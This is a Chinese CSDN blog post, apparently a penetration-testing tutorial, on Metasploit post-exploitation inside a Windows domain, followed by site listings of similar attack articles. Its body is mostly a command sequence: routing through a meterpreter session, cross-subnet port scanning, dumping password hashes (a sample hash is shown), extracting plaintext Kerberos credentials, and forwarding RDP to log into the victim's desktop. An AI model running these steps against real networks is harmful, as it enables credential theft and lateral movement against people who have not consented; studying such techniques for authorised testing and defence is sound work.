MSF 下域内渗透

最新推荐文章于 2024-02-21 15:17:44 发布
最新推荐文章于 2024-02-21 15:17:44 发布
阅读量383 收藏
点赞数 1
文章标签: sqlserver 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/candour_0/article/details/129543428
版权
本文详细介绍了使用MSF进行域内渗透的步骤,包括获取域内机器session、设置路由、扫描端口、获取hash值、端口转发、收集域信息、弱口令爆破等,旨在展示渗透测试中的高级技巧。
摘要由CSDN通过智能技术生成

MSF 下域内渗透实战

先获取域内机器session

img

run get_local_subnets //获取本地网络子网掩码

route add 192.168.233.0 255.255.255.0 1 //添加路由表

run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由

run autoroute -s 192.168.2.0/24 //添加动态路由

route print //打印路由表

use auxliary/scanner/portscan/tcp //使用扫描模块对整个 C 段跨网段扫描

use priv //运行注入

run post/windows/gather/hashdump //获取用户名 hash 值

img

Administrator:500:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4

只要是管理员在线或者没有注销。我们可以抓取明文的

kerberos //管理员在线或者没有注销下获取明文

img

3.收集域环境信息+找到域控

利用msf 的端口转发功能来转发一下,然后登入对方的远程桌面看看。

meterpreter > portfwd add -l 2222 -r 127.0.0.1 -p 3389 //反弹 127.0.0.1 端口 3389 到本地 2222 并监听

meterpreter > portfwd

root@kali:~# netstat -an | grep “2222”

root@kali:~# rdesktop 127.0.0.1:2222

img

img

成功登录目标远程桌面。

img</

最低0.47元/天 解锁文章
网络安全大菠萝
关注
【网络安全】MSF内网渗透
你在看屏幕的同时,屏幕也在注视着你
06-04 2906
内网渗透超级强悍
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
渗透必看!MSF 下域渗透实战
Appleteachers的博客
05-22 732
先获取内机器session run get_local_subnets //获取本地网络子网掩码 route add 192.168.233.0 255.255.255.0 1 //添加路由表 run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由 run autoroute -s 192.168.2.0/24 //添加动态路由 route print //打印路由表 use auxliary/scanner/portscan/tcp //
利用Metasploit Framework(msf)进行内网(渗透
初学者L_言的博客
07-03 5613
只要去往 192.168.47.0这个网段的数据都将通过 Session转发出去!!! 内网进行端口扫描:use auxiliary/scanner/portscan/tcp use exploit/windows/smb/ms08_067_netapi
ATT&CK实战系列三(msf渗透
weixin_44155363的博客
08-01 1575
因为这次为黑盒测试,给了5个虚拟机,centos为出网机器,具体的ip配置如下: web-centos:192.168.93.100 外网:192.168.167.135 web-ubantu:192.168.93.120 win7:192.168.93.30 win2008:192.168.93.20 win2012:192.168.93.10 给ip是为了提前把网络调通,免得浪费不必要的时间,保证网络通畅后将其余ip视为不知,仅从web-centos开始; 就一个是双网卡,其余都是单网卡内网机器 c
msf添加路由及socks代理进行内网穿透
2301_76227305的博客
02-21 2008
前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问以上的操作都是基于我们已经熟悉了其内网的环境,但在现实中往往要进行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
基于msf的后渗透协作平台 -- 后端部分.zip
03-03
《基于msf的后渗透协作平台 -- 后端部分》 在网络安全领渗透测试是一项重要的安全评估工作,用于发现并修复系统中的漏洞。Metasploit Framework(简称msf)是广泛使用的渗透测试工具,它提供了丰富的攻击载荷、...
MSF安卓手机渗透.md
12-07
MSF安卓手机渗透.md
内网渗透-渗透
qq_44806973的博客
11-23 5294
内网渗透(渗透) 基础指南
记一次简单渗透(part 1)
初学者L_言的博客
11-12 2201
一、环境 环境是自己搭的,基本模仿的企业部署 :learn.com 操作系统类型 IP地址 本地账户/密码 账户/密码 角色 Windows 2008 R2 192.168.138.129 Administrator/ learn\Administrator DC控 win@2008.com win@2008.com
记一次渗透实战思路分享
潇湘信安的博客
04-19 457
前几天帮朋友搞了一个,很久没有搞了感觉都快忘的差不多了,不过还好最终还是打穿了这个,不过应朋友要求就不以文章形式来写了,简单的整理了下思路和测试过程中遇到的一些问题和解决方法分享给大家,希望大家能够从中有所收获!应朋友的要求就不写文章了,整理了下思路和测试过程中遇到的一些问题和解决方法分享给大家。
Metasploit渗透测试全程实录(终结篇)
dfdhxb995397的博客
11-15 266
本文作者:i春秋签约作家——shuteer 前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里。于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求。今天小菜我本着所有师傅们无私分享的精神,特将三年内求师傅,求妹子,求神器所得,经过整理后,关键的知识点写出来。相关知识点总结如下: 免杀payload的生成,请...
Kali Linux渗透之Metasploit攻防实战技巧
04-12
一、课程概要       本课程主要分享Kali Linux渗透之Metasploit攻防实战技巧! 二、适合人员       1、大学生       2、IT技术员       3、运维工程师       4、服务器工程师       5、渗透测试工程师
Windows网络服务渗透测试实战-跨网段攻击
c_lanxiaofang的博客
05-19 6390
一、实验项目名称 Windows网络服务渗透测试实战-跨网段攻击 二、实验目的及要求 掌握对跨网段攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 获取winxp系统管理员admin的密码,并使xp系统关机 ----基础配置---- 1、选择win7 2.选择winXP 3、选择kali 4、查看kali的ip 5、查看winXP的ip 6、查看win7的IP 总结如下: ...
内网渗透之多种方式实现内网穿透(详细)
qq_38348692的博客
09-03 1万+
靶机为win7 使用ms17_010_enternalbule获得meterpreter权限,在这里注意,设置payload是必须的,否则不能获得metepreter权限,直接弹到 创建跳板路由: run autoroute -s 192.168.10.0/24 创建路由 run autoroute -p 打印路由[在这里插入图片描述] 输入background退回metaploit可以看...
【内网安全】——meterpreter使用攻略
qq_53058639的博客
01-26 1125
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
metasploit小白教程总结
sweetie 的博客
01-03 2438
msf小白学习教程一 1.msf是什么? msf全称:metasplpit 作用:Metasploit是一个渗透测试平台 环境:kali-linux 自动搭建了msf环境 2.msf的详细分解 在这边我就化繁为简,把一些我感觉重要常用的功能详细的讲解一番。 2.1搜索模块 首先肯定是启动msf,启动就很简单了,在kali命令行输入:msfconsole 如果记不住,可以直接:msfc然后加一个tab,然后就会自动补全,回车就好了。 2.1.1 搜索模块命令:search 命令介绍:msfconsole
MSF的钓鱼渗透攻击原理
最新发布
05-26
MSF(Metasploit Framework)是一款常用的渗透测试工具,它可以通过钓鱼攻击来获取目标计算机的访问权限。 钓鱼攻击原理是利用社交工程学原理,通过发送欺骗性的信息或者伪造网站等方式,诱导目标用户点击链接或者下载文件,从而在其计算机中植入木马或者后门程序。当攻击者获取了目标计算机的访问权限后,就可以利用漏洞或者其他方式获取敏感信息或者控制目标计算机。 MSF钓鱼渗透攻击主要分为以下几个步骤: 1. 伪造欺骗性信息:攻击者利用社交工程学原理,伪造看似真实的邮件、网站等信息,以诱导目标用户点击链接或下载文件。 2. 植入木马或后门程序:一旦目标用户点击链接或下载文件,攻击者就会在其计算机中植入木马或后门程序,从而获取访问权限。 3. 利用漏洞获取敏感信息:攻击者可以利用漏洞或其他方式获取目标计算机中的敏感信息。 4. 控制目标计算机:攻击者可以利用木马或后门程序对目标计算机进行控制,例如远程执行命令、上传下载文件等操作。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值